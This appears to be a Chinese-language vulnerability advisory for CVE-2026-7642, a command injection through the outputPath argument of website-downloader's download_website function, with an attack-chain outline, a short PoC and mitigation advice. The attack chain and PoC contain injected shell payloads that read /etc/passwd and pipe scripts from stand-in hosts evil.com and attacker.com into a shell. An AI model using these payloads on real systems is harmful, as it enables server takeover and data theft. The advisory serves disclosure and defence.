CVE-2026-7642 CVSS 6.3 中危

CVE-2026-7642 pskill9 website-downloader 命令注入漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7642

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

pskill9 website-downloader

漏洞概述

pskill9开发的website-downloader组件在0.1.0及之前版本中存在严重的安全漏洞。该漏洞位于src/index.ts文件的download_website函数中，由于对outputPath参数缺乏有效的过滤机制，导致攻击者可以远程操纵该参数以执行任意操作系统命令。尽管CVSS评分为6.3（中等），但由于利用门槛低且无需用户交互，该漏洞对服务器安全性构成直接威胁。目前漏洞细节已公开，且官方尚未发布修复补丁，建议用户尽快采取缓解措施。

技术细节

该漏洞源于组件在处理文件下载路径时的不安全编程实践。在src/index.ts的download_website函数中，程序直接接收用户提供的outputPath参数，并将其拼接到系统命令中执行，而未进行严格的输入清洗或转义。这种设计允许攻击者通过注入Shell元字符（如分号、管道符或反引号）来打断原有命令结构，从而追加并执行恶意指令。根据CVSS向量分析，攻击复杂度低，无需用户交互，且仅需低权限即可发起攻击。成功利用此漏洞可导致攻击者在服务器上下文中执行任意代码，进而造成数据泄露、篡改或服务中断。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标系统正在使用pskill9/website-downloader组件，且版本在0.1.0或以下。

STEP 2

2. 构造_payload

攻击者构造包含Shell元字符的恶意outputPath参数，例如 '; cat /etc/passwd' 或 '; curl http://evil.com/sh | sh'。

STEP 3

3. 发送请求

攻击者通过网络向受影响的应用程序接口发送请求，触发download_website函数，并传入恶意参数。

STEP 4

4. 命令执行

应用程序未过滤参数直接拼接执行系统命令，导致注入的恶意指令在服务器端运行。

STEP 5

5. 建立立足点

攻击者利用执行的结果获取敏感信息、写入Webshell或建立反向Shell连接，从而控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-7642
// Manipulating the outputPath argument to inject commands

const { download_website } = require('website-downloader');

// Normal usage
// download_website('http://example.com', './output');

// Malicious usage: Injecting a command to create a file
// The payload uses a semicolon to separate commands
const maliciousPath = './valid/path; touch /tmp/pwned;';

// Trigger the vulnerability
// This will execute: <command> ./valid/path; touch /tmp/pwned;
download_website('http://example.com', maliciousPath, (err) => {
    if (err) console.error(err);
});

// Or using backticks for command substitution
const reverseShellPath = '`curl attacker.com/shell.sh | bash`';
download_website('http://target.com', reverseShellPath);

影响范围

pskill9 website-downloader <= 0.1.0

防御指南

临时缓解措施

在官方补丁发布前，建议对传入的outputPath参数进行严格的正则表达式校验，剔除所有Shell特殊字符（如 ; | & $ ` < > 等）。此外，应将应用服务运行在独立的容器或受限用户环境中，以防止命令注入成功后波及整个宿主机系统。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7642
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7642
3 Details https://www.cvedetails.com/cve/CVE-2026-7642/
4 VulDB https://vuldb.com/cve/CVE-2026-7642
5 Link https://github.com/BruceJqs/public_exp/issues/31
6 Link https://github.com/pskill9/website-downloader/
7 Link https://github.com/pskill9/website-downloader/issues/7
8 Link https://vuldb.com/submit/806812
9 Link https://vuldb.com/vuln/360754
10 Link https://vuldb.com/vuln/360754/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表